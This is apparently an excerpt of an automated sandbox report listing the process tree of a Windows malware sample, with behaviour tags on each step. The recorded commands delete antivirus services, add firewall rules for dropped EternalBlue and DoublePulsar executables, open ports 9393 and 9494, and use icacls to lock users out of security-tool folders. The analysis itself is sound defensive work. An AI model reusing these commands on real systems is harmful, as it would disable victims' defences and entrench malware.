C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:3556
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:1712
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows7⤵
- Views/modifies file attributes
PID:2548
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵PID:5444
-
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
- Launches sc.exe
PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵PID:188
-
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
- Launches sc.exe
PID:536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵PID:3136
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
- Launches sc.exe
PID:4864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵PID:5832
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
- Launches sc.exe
PID:2704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵PID:5220
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵PID:5496
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
- Launches sc.exe
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵PID:792
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
PID:5460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
- System Location Discovery: System Language Discovery
PID:1184 -
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
- Launches sc.exe
PID:2852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
- System Location Discovery: System Language Discovery
PID:1120 -
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"4⤵
- System Location Discovery: System Language Discovery
PID:4844 -
C:\Windows\SysWOW64\sc.exesc delete "windows node"5⤵
- Launches sc.exe
PID:5212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer4⤵PID:1972
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer5⤵
- Launches sc.exe
PID:508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer4⤵PID:1108
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer5⤵
- Launches sc.exe
PID:4552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle4⤵PID:936
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle5⤵
- Launches sc.exe
PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"4⤵PID:6056
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"5⤵
- Launches sc.exe
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer4⤵PID:4596
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer5⤵
- Launches sc.exe
PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"4⤵PID:5856
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"5⤵
- Launches sc.exe
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_644⤵PID:2596
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_645⤵
- Launches sc.exe
PID:3236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"4⤵
- System Location Discovery: System Language Discovery
PID:5148 -
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql4⤵PID:6008
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql5⤵
- Launches sc.exe
PID:5668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql4⤵PID:1620
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql5⤵
- Launches sc.exe
PID:3260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵PID:4980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5216
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵PID:1184
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵PID:5816
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵PID:1828
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵PID:5932
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵PID:2180
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- System Location Discovery: System Language Discovery
PID:3700 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵PID:6008
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵PID:5972
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵PID:5764
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵PID:4760
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵PID:1972
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵PID:5472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5496
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵PID:5932
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵PID:4864
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵PID:5568
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵PID:3820
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵PID:3260
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵PID:6032
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵PID:3788
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)4⤵PID:4316
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵PID:5808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)4⤵PID:352
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵PID:5304
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)4⤵PID:1120
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:5824 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)4⤵PID:1496
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵PID:3136
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)4⤵PID:4388
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵PID:3184
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)4⤵PID:5688
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵PID:1044
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)4⤵PID:3788
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵PID:1200
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)4⤵PID:2536
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:5704 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)4⤵PID:5872
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)5⤵
- Modifies file permissions
PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- System Location Discovery: System Language Discovery
PID:1184 -
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
PID:5972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)4⤵
- System Location Discovery: System Language Discovery
PID:3128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3820
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)5⤵
- Modifies file permissions
PID:5216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵PID:2672
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
- Modifies file permissions
PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1712 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵PID:3724
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2824 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2980
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵PID:4440
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2052 -
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)4⤵PID:2660
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:5848 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:344
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)4⤵PID:5888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4840
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)4⤵PID:2576
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3724
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)4⤵PID:4104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:832
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2052 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)4⤵PID:3760
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:5736 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)4⤵PID:4892
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)4⤵PID:3136
-
